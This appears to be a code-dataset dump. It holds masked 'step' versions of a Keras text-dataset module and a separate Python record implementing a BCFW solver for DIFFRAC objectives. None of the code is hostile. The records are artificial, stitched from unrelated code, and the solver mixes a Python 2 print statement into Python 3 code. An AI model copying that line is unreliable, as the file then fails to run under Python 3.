"step-3": "<mask token>\n\n\nclass BaseDataset(SourceTargetMixin):\n\n def __init__(self, source: Union[Iterable, Sized], target: Union[\n Iterable, Sized], shuffle: bool=True, seed: int=42):\n self.source = source\n self.target = target\n self._validate()\n if shuffle:\n self.shuffle(seed)\n <mask token>\n <mask token>\n\n\nclass TokenizerPair(SourceTargetMixin):\n\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) ->bool:\n return hasattr(self.source, 'word_index') and hasattr(self.target,\n 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) ->int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) ->int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-4": "<mask token>\n\n\nclass BaseDataset(SourceTargetMixin):\n\n def __init__(self, source: Union[Iterable, Sized], target: Union[\n Iterable, Sized], shuffle: bool=True, seed: int=42):\n self.source = source\n self.target = target\n self._validate()\n if shuffle:\n self.shuffle(seed)\n\n def _validate(self) ->None:\n src_len = len(self.source)\n target_len = len(self.target)\n if src_len != target_len:\n raise TypeError(\n 'Number of source rows ({}) does not match the number of target rows ({})'\n .format(src_len, target_len))\n\n def shuffle(self, seed: int=42) ->None:\n np.random.seed(seed)\n shuffled_indexes = np.random.permutation(len(self.source))\n self.source = self.source[shuffled_indexes]\n self.target = self.target[shuffled_indexes]\n\n\nclass TokenizerPair(SourceTargetMixin):\n\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) ->bool:\n return hasattr(self.source, 'word_index') and hasattr(self.target,\n 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) ->int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) ->int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-5": "from collections import defaultdict\nfrom typing import Union, Iterable, Sized\n\nimport numpy as np\nfrom cached_property import cached_property\nfrom keras.utils import to_categorical\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\n\n\nclass SourceTargetMixin:\n \"\"\"\n Allows subscription with 'source' and 'target' keywords\n \"\"\"\n def __getitem__(self, item):\n if item in ['source', 'target']:\n return getattr(self, item)\n raise TypeError('Subscription is available '\n 'only with \"source\" and \"target\" keywords')\n\n\nclass BaseDataset(SourceTargetMixin):\n def __init__(self, source: Union[Iterable, Sized],\n target: Union[Iterable, Sized],\n shuffle: bool=True, seed: int=42):\n self.source = source\n self.target = target\n self._validate()\n if shuffle:\n self.shuffle(seed)\n\n def _validate(self) -> None:\n src_len = len(self.source)\n target_len = len(self.target)\n if src_len != target_len:\n raise TypeError('Number of source rows ({}) does not match '\n 'the number of target rows ({})'.format(src_len,\n target_len))\n\n def shuffle(self, seed: int=42) -> None:\n np.random.seed(seed)\n shuffled_indexes = np.random.permutation(len(self.source))\n self.source = self.source[shuffled_indexes]\n self.target = self.target[shuffled_indexes]\n\n\nclass TokenizerPair(SourceTargetMixin):\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) -> bool:\n return hasattr(self.source, 'word_index') \\\n and hasattr(self.target, 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized],\n shuffle: bool=True, word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) -> int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) -> int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) -> int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) -> int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) -> int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) -> int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) -> None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n\n # limit number of words returned from tokenizer\n # according to frequency threshold\n self.tokenizer_pair['source'].num_words = len(\n [word for word, count\n in self.tokenizer_pair['source'].word_counts.items()\n if count > self.word_frequency_threshold - 1]\n )\n\n self.tokenizer_pair['target'].num_words = len(\n [word for word, count\n in self.tokenizer_pair['target'].word_counts.items()\n if count > self.word_frequency_threshold - 1]\n )\n\n def get_sequences(self, level: str) -> np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n\n return pad_sequences(\n sentences, maxlen=self.max_sentence_length(level), padding='post'\n )\n\n def encode_output(self, sequences: np.array) -> np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) -> str:\n target_sentence = [\n self.tokenizer_pair.target_index_word.get(word_index, '')\n for word_index in sequence\n ]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) -> np.ndarray:\n return pad_sequences(\n self.tokenizer_pair['source'].texts_to_sequences([sentence]),\n self.max_sentence_length('source'), padding='post'\n )\n",
"step-ids": [
12,
19,
20,
22,
27
]
}
|
[
12,
19,
20,
22,
27
] |
""" Implements BCFW for DIFFRAC objectives. """
import numpy as np
import os
from tqdm import tqdm
from numpy.linalg import norm as matrix_norm
import time
def get_feat_block(feats, block_idx, memory_mode, bias_value=-1.0):
"""Get feature for a given block."""
if memory_mode == 'RAM':
feat = feats[block_idx]
elif memory_mode == 'disk':
feat = np.load(feats[block_idx])
else:
raise ValueError(
'Memory mode {} is not supported.'.format(memory_mode))
if bias_value > 0.0:
feat = np.append(
feat, bias_value * np.ones([feat.shape[0], 1]), axis=1)
return feat
def get_p_block(p_matrix, block_idx, memory_mode):
if memory_mode == 'RAM':
return p_matrix[block_idx]
elif memory_mode == 'disk':
return np.load(p_matrix[block_idx])
else:
raise ValueError(
'Memory mode {} is not supported.'.format(memory_mode))
def compute_p_matrix(feats, alpha, memory_mode, bias_value=-1.0):
"""Precompute the P dictionnary matrix."""
_, d = np.shape(
get_feat_block(feats, 0, memory_mode, bias_value=bias_value))
# Compute X^TX
print('Computing xtx...')
x_t_x = np.zeros([d, d])
N = 0
for i in tqdm(range(len(feats))):
x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)
x_t_x += np.dot(np.transpose(x), x)
N += x.shape[0]
# Compute P
p_matrix = []
print('Inverting big matrix...')
inv_mat = np.linalg.inv(x_t_x + N * alpha * np.eye(d))
print('Computing P matrix by block...')
for i in tqdm(range(len(feats))):
x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)
sol = np.dot(inv_mat, np.transpose(x))
if memory_mode == 'RAM':
p_matrix.append(np.array(sol))
else:
path_x = feats[i]
base_path, filename = os.path.split(path_x)
np.save(os.path.join(base_path, 'P_{}'.format(filename)), sol)
p_matrix.append(path_x)
return p_matrix, N
def compute_weights(p_matrix, asgn, memory_mode):
d, _ = np.shape(get_p_block(p_matrix, 0, memory_mode))
_, k = np.shape(asgn[0])
weights = np.zeros([d, k])
print('Computing weights from scratch...')
for i in tqdm(range(len(p_matrix))):
weights += np.dot(get_p_block(p_matrix, i, memory_mode), asgn[i])
return weights
def compute_obj(x, y, weights, n_feats):
return 1.0 / n_feats * matrix_norm(np.dot(x, weights) - y, ord='fro')**2
def compute_grad(x, y, weights, n_feats):
return 1.0 / n_feats * (y - np.dot(x, weights))
def compute_gap(x,
y,
weights,
n_feats,
cstr,
cstr_solver,
opt_y=None,
grad_y=None):
# Check if we need to call the oracle.
if opt_y is None:
grad_y = compute_grad(x, y, weights, n_feats)
opt_y = cstr_solver.solve(cstr, grad_y)
gap = -np.multiply(opt_y - y, grad_y).sum()
return gap
def sample_block(gaps, block_sampling):
if block_sampling == 'uniform':
return np.random.randint(0, len(gaps), 1)[0]
elif block_sampling == 'gap_sampling':
if not np.all(gaps >= 0):
print('Warning: some gaps are negative block {}, value :{}'.format(
gaps.argmin(), gaps.min()))
gaps[gaps < 0] = 0.00000001
gap_prob = gaps / gaps.sum()
return np.random.choice(len(gaps), 1, p=gap_prob)[0]
def display_information(iter,
max_iter,
gaps,
eval_metric,
objective_value=None,
verbose='silent',
prev_time=-1,
prev_global_time=-1):
"""Display information about the training."""
if objective_value is None:
objective_value = []
if verbose in ['normal', 'heavy']:
string_display = 'Iteration {0:05d}/{1:05d}, Gap sum: {2:.4E}'.format(
iter, max_iter, gaps.sum())
new_time = time.time()
if prev_time > 0:
diff_time = int(round(new_time - prev_time))
string_display += ' ({:d} s)'.format(diff_time)
if prev_global_time > 0:
diff_time = int(round(new_time - prev_global_time))
string_display += ' (Glob. {:d} s)'.format(diff_time)
if eval_metric >= 0:
string_display += ', Eval metric: {:.2f}'.format(eval_metric)
if objective_value:
string_display += ', Objective: '
string_display += ','.join([
'{}: {:.4E}'.format(key, value)
for key, value in objective_value.items()
])
print(string_display)
def save_asgn_block(path_save_asgn, block_idx, asgn, t):
np.save(
os.path.join(path_save_asgn, '{0}_{1:05d}.npy'.format(block_idx, t)),
asgn[block_idx])
def save_xw_block(path_save_asgn, block_idx, x, weights, t):
np.save(
os.path.join(path_save_asgn, 'xw_{0}_{1:05d}.npy'.format(block_idx,
t)),
np.dot(x, weights))
def save_gt_block(path_save_asgn, block_idx, gts):
np.save(
os.path.join(path_save_asgn, '{}_gt.npy'.format(block_idx)),
gts[block_idx])
def solver(feats,
asgn,
cstrs,
cstrs_solver,
gts=None,
eval_function=None,
rounding_function=None,
alpha=1e-4,
memory_mode='RAM',
bias_value=-1.0,
n_iterations=10000,
block_sampling='uniform',
verbose='silent',
gap_frequency=2000,
eval_frequency=500,
verbose_frequency=250,
objective_frequency=250,
path_save_asgn=None,
validation_info=None):
"""Main solver for DiffracBCFW.
Args:
feats: Input features as a list (one entry per block).
asgn: Assignment variables as a list (one entry per block). This provides
the initialization of the system.
cstrs: Input constraints as a dictionary (one entry per block).
cstrs_solver: Method that takes as input a gradient for a block and a cstrs and then
returns the LP solution.
gts: A ground truth can be specified if you wish to evaluate your solution.
eval_function: an eval function method can be provided.
rounding_function: rounding function.
alpha: Value of the regularization parameter (lambda in the paper).
memory_mode: `disk` (features are stored in disk) or `RAM` (features are in RAM).
bias_value: Value to add for the bias (if negative no bias is added to the features).
n_iterations: Number of iterations of the solver.
block_sampling: Method for sampling block.
verbose: `silent`, `normal`, `heavy`.
gap_frequency: frequency to recompute all the gaps.
eval_frequency: frequency to perform evaluation.
verbose_frequency: frequency to print info.
objective_frequency: frequency to compute objective (only used if positive).
path_save_asgn: If not None save asgn at path_save_asgn. None by default.
validation_info: If not None perform evaluation on validation
"""
compute_objective = False
objective_value = None
if objective_frequency > 0:
compute_objective = True
save_asgn = False
save_ids = []
if path_save_asgn is not None:
if not os.path.exists(path_save_asgn):
os.makedirs(path_save_asgn)
# Monitor evolution of asgn during optim on a subset of samples.
save_asgn = True
n_save_asgn = min(20, len(asgn))
save_ids = np.random.choice(len(asgn), n_save_asgn, replace=False)
# Pre-compute the P matrix.
p_matrix, n_feats = compute_p_matrix(
feats, alpha, memory_mode, bias_value=bias_value)
# Compute W.
weights = compute_weights(p_matrix, asgn, memory_mode=memory_mode)
# Init the gaps.
gaps = np.zeros(len(feats))
print('Computing init gaps...')
for block_idx in tqdm(range(len(feats))):
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
gaps[block_idx] = compute_gap(x, asgn[block_idx], weights, n_feats,
cstrs[block_idx], cstrs_solver)
if save_asgn and block_idx in save_ids:
save_asgn_block(path_save_asgn, block_idx, asgn, 0)
save_xw_block(path_save_asgn, block_idx, x, weights, 0)
save_gt_block(path_save_asgn, block_idx, gts)
print('Init gap: {0:4E}, starting the optimization...'.format(gaps.sum()))
eval_metric = -1.0
prev_time = time.time() # init time of iterations
prev_global_time = prev_time
for t in range(n_iterations):
if eval_frequency > 0 and t % eval_frequency == 0:
# Evaluation.
if eval_function is not None and gts is not None:
print('Performing evaluation...')
eval_metric = eval_function.evaluate(asgn, gts, weights, feats,
rounding_function, cstrs)
if validation_info is not None:
gts_val = validation_info['gts']
feats_val = validation_info['feats']
eval_function.evaluate(None, gts_val, weights, feats_val,
rounding_function, None)
else:
eval_metric = -1.0
if compute_objective and t % objective_frequency == 0:
print('Computing objective...')
objective_value = {}
# Compute the diffrac objective.
dfrac_obj = 0.0
# Data dependent term: 1.0 / N * ||X * W - Y||_2^2
for block_idx in range(len(feats)):
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
dfrac_obj += compute_obj(x, asgn[block_idx], weights, n_feats)
# Regularization term: \alpha * || W ||_2^2
dfrac_obj += alpha * matrix_norm(weights, ord='fro')**2
objective_value['dfrac'] = dfrac_obj
# Print information.
if t % verbose_frequency == 0:
display_information(t, n_iterations, gaps, eval_metric,
objective_value, verbose, prev_time, prev_global_time)
prev_time = time.time()
# Sample a block.
block_idx = sample_block(gaps, block_sampling)
# Compute gradient.
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
y = asgn[block_idx]
grad_y = compute_grad(x, y, weights, n_feats)
opt_y = cstrs_solver.solve(cstrs[block_idx], grad_y)
gaps[block_idx] = compute_gap(x, y, weights, n_feats,
cstrs[block_idx], cstrs_solver,
opt_y, grad_y)
# Step size computation.
p = get_p_block(p_matrix, block_idx, memory_mode)
dir_y = opt_y - y
gamma_n = gaps[block_idx]
gamma_d = 1.0 / n_feats * np.multiply(
dir_y, dir_y - np.linalg.multi_dot([x, p, dir_y])).sum()
gamma = min(1.0, gamma_n / gamma_d)
# gamma should always be positive.
if gamma < 0:
print 'Warning: gamma = {}, gap_i = {}'.format(
gamma, gaps[block_idx])
gamma = 0.0
# Update variables.
asgn[block_idx] += gamma * dir_y
weights += gamma * np.dot(p, dir_y)
if save_asgn and block_idx in save_ids:
save_asgn_block(path_save_asgn, block_idx, asgn, t)
save_xw_block(path_save_asgn, block_idx, x, weights, t)
# Update gaps if needed.
if (t + 1) % gap_frequency == 0:
print('Recomputing gaps...')
for block_idx in tqdm(range(len(feats))):
x = get_feat_block(
feats, block_idx, memory_mode, bias_value=bias_value)
gaps[block_idx] = compute_gap(x, asgn[block_idx], weights,
n_feats, cstrs[block_idx],
cstrs_solver)
display_information(t, n_iterations, gaps, eval_metric,
objective_value, verbose)
return asgn, weights
|
normal
|
{
"blob_id": "af02cd0778e19df7b11145c4863776a1afd1cca6",
"index": 1484,
"step-1": "\"\"\" Implements BCFW for DIFFRAC objectives. \"\"\"\n\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom numpy.linalg import norm as matrix_norm\nimport time\n\n\ndef get_feat_block(feats, block_idx, memory_mode, bias_value=-1.0):\n \"\"\"Get feature for a given block.\"\"\"\n if memory_mode == 'RAM':\n feat = feats[block_idx]\n elif memory_mode == 'disk':\n feat = np.load(feats[block_idx])\n else:\n raise ValueError(\n 'Memory mode {} is not supported.'.format(memory_mode))\n\n if bias_value > 0.0:\n feat = np.append(\n feat, bias_value * np.ones([feat.shape[0], 1]), axis=1)\n\n return feat\n\n\ndef get_p_block(p_matrix, block_idx, memory_mode):\n if memory_mode == 'RAM':\n return p_matrix[block_idx]\n elif memory_mode == 'disk':\n return np.load(p_matrix[block_idx])\n else:\n raise ValueError(\n 'Memory mode {} is not supported.'.format(memory_mode))\n\n\ndef compute_p_matrix(feats, alpha, memory_mode, bias_value=-1.0):\n \"\"\"Precompute the P dictionnary matrix.\"\"\"\n _, d = np.shape(\n get_feat_block(feats, 0, memory_mode, bias_value=bias_value))\n\n # Compute X^TX\n print('Computing xtx...')\n x_t_x = np.zeros([d, d])\n N = 0\n for i in tqdm(range(len(feats))):\n x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)\n x_t_x += np.dot(np.transpose(x), x)\n N += x.shape[0]\n\n # Compute P\n p_matrix = []\n print('Inverting big matrix...')\n inv_mat = np.linalg.inv(x_t_x + N * alpha * np.eye(d))\n print('Computing P matrix by block...')\n for i in tqdm(range(len(feats))):\n x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)\n sol = np.dot(inv_mat, np.transpose(x))\n if memory_mode == 'RAM':\n p_matrix.append(np.array(sol))\n else:\n path_x = feats[i]\n base_path, filename = os.path.split(path_x)\n np.save(os.path.join(base_path, 'P_{}'.format(filename)), sol)\n p_matrix.append(path_x)\n\n return p_matrix, N\n\n\ndef compute_weights(p_matrix, asgn, memory_mode):\n d, _ = np.shape(get_p_block(p_matrix, 0, memory_mode))\n _, k = np.shape(asgn[0])\n\n weights = np.zeros([d, k])\n\n print('Computing weights from scratch...')\n for i in tqdm(range(len(p_matrix))):\n weights += np.dot(get_p_block(p_matrix, i, memory_mode), asgn[i])\n\n return weights\n\n\ndef compute_obj(x, y, weights, n_feats):\n return 1.0 / n_feats * matrix_norm(np.dot(x, weights) - y, ord='fro')**2\n\n\ndef compute_grad(x, y, weights, n_feats):\n return 1.0 / n_feats * (y - np.dot(x, weights))\n\n\ndef compute_gap(x,\n y,\n weights,\n n_feats,\n cstr,\n cstr_solver,\n opt_y=None,\n grad_y=None):\n\n # Check if we need to call the oracle.\n if opt_y is None:\n grad_y = compute_grad(x, y, weights, n_feats)\n opt_y = cstr_solver.solve(cstr, grad_y)\n\n gap = -np.multiply(opt_y - y, grad_y).sum()\n\n return gap\n\n\ndef sample_block(gaps, block_sampling):\n if block_sampling == 'uniform':\n return np.random.randint(0, len(gaps), 1)[0]\n elif block_sampling == 'gap_sampling':\n if not np.all(gaps >= 0):\n print('Warning: some gaps are negative block {}, value :{}'.format(\n gaps.argmin(), gaps.min()))\n gaps[gaps < 0] = 0.00000001\n\n gap_prob = gaps / gaps.sum()\n return np.random.choice(len(gaps), 1, p=gap_prob)[0]\n\n\ndef display_information(iter,\n max_iter,\n gaps,\n eval_metric,\n objective_value=None,\n verbose='silent',\n prev_time=-1,\n prev_global_time=-1):\n \"\"\"Display information about the training.\"\"\"\n if objective_value is None:\n objective_value = []\n\n if verbose in ['normal', 'heavy']:\n string_display = 'Iteration {0:05d}/{1:05d}, Gap sum: {2:.4E}'.format(\n iter, max_iter, gaps.sum())\n\n new_time = time.time()\n if prev_time > 0:\n diff_time = int(round(new_time - prev_time))\n string_display += ' ({:d} s)'.format(diff_time)\n if prev_global_time > 0:\n diff_time = int(round(new_time - prev_global_time))\n string_display += ' (Glob. {:d} s)'.format(diff_time)\n\n if eval_metric >= 0:\n string_display += ', Eval metric: {:.2f}'.format(eval_metric)\n\n if objective_value:\n string_display += ', Objective: '\n string_display += ','.join([\n '{}: {:.4E}'.format(key, value)\n for key, value in objective_value.items()\n ])\n\n print(string_display)\n\n\ndef save_asgn_block(path_save_asgn, block_idx, asgn, t):\n np.save(\n os.path.join(path_save_asgn, '{0}_{1:05d}.npy'.format(block_idx, t)),\n asgn[block_idx])\n\n\ndef save_xw_block(path_save_asgn, block_idx, x, weights, t):\n np.save(\n os.path.join(path_save_asgn, 'xw_{0}_{1:05d}.npy'.format(block_idx,\n t)),\n np.dot(x, weights))\n\n\ndef save_gt_block(path_save_asgn, block_idx, gts):\n np.save(\n os.path.join(path_save_asgn, '{}_gt.npy'.format(block_idx)),\n gts[block_idx])\n\n\ndef solver(feats,\n asgn,\n cstrs,\n cstrs_solver,\n gts=None,\n eval_function=None,\n rounding_function=None,\n alpha=1e-4,\n memory_mode='RAM',\n bias_value=-1.0,\n n_iterations=10000,\n block_sampling='uniform',\n verbose='silent',\n gap_frequency=2000,\n eval_frequency=500,\n verbose_frequency=250,\n objective_frequency=250,\n path_save_asgn=None,\n validation_info=None):\n \"\"\"Main solver for DiffracBCFW.\n\n Args:\n feats: Input features as a list (one entry per block).\n asgn: Assignment variables as a list (one entry per block). This provides\n the initialization of the system.\n cstrs: Input constraints as a dictionary (one entry per block).\n cstrs_solver: Method that takes as input a gradient for a block and a cstrs and then\n returns the LP solution.\n gts: A ground truth can be specified if you wish to evaluate your solution.\n eval_function: an eval function method can be provided.\n rounding_function: rounding function.\n alpha: Value of the regularization parameter (lambda in the paper).\n memory_mode: `disk` (features are stored in disk) or `RAM` (features are in RAM).\n bias_value: Value to add for the bias (if negative no bias is added to the features).\n n_iterations: Number of iterations of the solver.\n block_sampling: Method for sampling block.\n verbose: `silent`, `normal`, `heavy`.\n gap_frequency: frequency to recompute all the gaps.\n eval_frequency: frequency to perform evaluation.\n verbose_frequency: frequency to print info.\n objective_frequency: frequency to compute objective (only used if positive).\n path_save_asgn: If not None save asgn at path_save_asgn. None by default.\n validation_info: If not None perform evaluation on validation\n \"\"\"\n\n compute_objective = False\n objective_value = None\n if objective_frequency > 0:\n compute_objective = True\n\n save_asgn = False\n save_ids = []\n if path_save_asgn is not None:\n if not os.path.exists(path_save_asgn):\n os.makedirs(path_save_asgn)\n # Monitor evolution of asgn during optim on a subset of samples.\n save_asgn = True\n n_save_asgn = min(20, len(asgn))\n save_ids = np.random.choice(len(asgn), n_save_asgn, replace=False)\n\n # Pre-compute the P matrix.\n p_matrix, n_feats = compute_p_matrix(\n feats, alpha, memory_mode, bias_value=bias_value)\n\n # Compute W.\n weights = compute_weights(p_matrix, asgn, memory_mode=memory_mode)\n\n # Init the gaps.\n gaps = np.zeros(len(feats))\n print('Computing init gaps...')\n for block_idx in tqdm(range(len(feats))):\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n gaps[block_idx] = compute_gap(x, asgn[block_idx], weights, n_feats,\n cstrs[block_idx], cstrs_solver)\n\n if save_asgn and block_idx in save_ids:\n save_asgn_block(path_save_asgn, block_idx, asgn, 0)\n save_xw_block(path_save_asgn, block_idx, x, weights, 0)\n save_gt_block(path_save_asgn, block_idx, gts)\n\n print('Init gap: {0:4E}, starting the optimization...'.format(gaps.sum()))\n\n eval_metric = -1.0\n prev_time = time.time() # init time of iterations\n prev_global_time = prev_time\n for t in range(n_iterations):\n if eval_frequency > 0 and t % eval_frequency == 0:\n # Evaluation.\n if eval_function is not None and gts is not None:\n print('Performing evaluation...')\n eval_metric = eval_function.evaluate(asgn, gts, weights, feats,\n rounding_function, cstrs)\n if validation_info is not None:\n gts_val = validation_info['gts']\n feats_val = validation_info['feats']\n eval_function.evaluate(None, gts_val, weights, feats_val,\n rounding_function, None)\n else:\n eval_metric = -1.0\n\n if compute_objective and t % objective_frequency == 0:\n print('Computing objective...')\n objective_value = {}\n # Compute the diffrac objective.\n dfrac_obj = 0.0\n # Data dependent term: 1.0 / N * ||X * W - Y||_2^2\n for block_idx in range(len(feats)):\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n dfrac_obj += compute_obj(x, asgn[block_idx], weights, n_feats)\n\n # Regularization term: \\alpha * || W ||_2^2\n dfrac_obj += alpha * matrix_norm(weights, ord='fro')**2\n objective_value['dfrac'] = dfrac_obj\n\n # Print information.\n if t % verbose_frequency == 0:\n display_information(t, n_iterations, gaps, eval_metric,\n objective_value, verbose, prev_time, prev_global_time)\n prev_time = time.time()\n\n # Sample a block.\n block_idx = sample_block(gaps, block_sampling)\n # Compute gradient.\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n y = asgn[block_idx]\n\n grad_y = compute_grad(x, y, weights, n_feats)\n\n opt_y = cstrs_solver.solve(cstrs[block_idx], grad_y)\n gaps[block_idx] = compute_gap(x, y, weights, n_feats,\n cstrs[block_idx], cstrs_solver,\n opt_y, grad_y)\n\n # Step size computation.\n p = get_p_block(p_matrix, block_idx, memory_mode)\n dir_y = opt_y - y\n gamma_n = gaps[block_idx]\n\n gamma_d = 1.0 / n_feats * np.multiply(\n dir_y, dir_y - np.linalg.multi_dot([x, p, dir_y])).sum()\n\n gamma = min(1.0, gamma_n / gamma_d)\n # gamma should always be positive.\n if gamma < 0:\n print 'Warning: gamma = {}, gap_i = {}'.format(\n gamma, gaps[block_idx])\n gamma = 0.0\n\n # Update variables.\n asgn[block_idx] += gamma * dir_y\n weights += gamma * np.dot(p, dir_y)\n\n if save_asgn and block_idx in save_ids:\n save_asgn_block(path_save_asgn, block_idx, asgn, t)\n save_xw_block(path_save_asgn, block_idx, x, weights, t)\n\n # Update gaps if needed.\n if (t + 1) % gap_frequency == 0:\n print('Recomputing gaps...')\n for block_idx in tqdm(range(len(feats))):\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n gaps[block_idx] = compute_gap(x, asgn[block_idx], weights,\n n_feats, cstrs[block_idx],\n cstrs_solver)\n display_information(t, n_iterations, gaps, eval_metric,\n objective_value, verbose)\n\n return asgn, weights\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
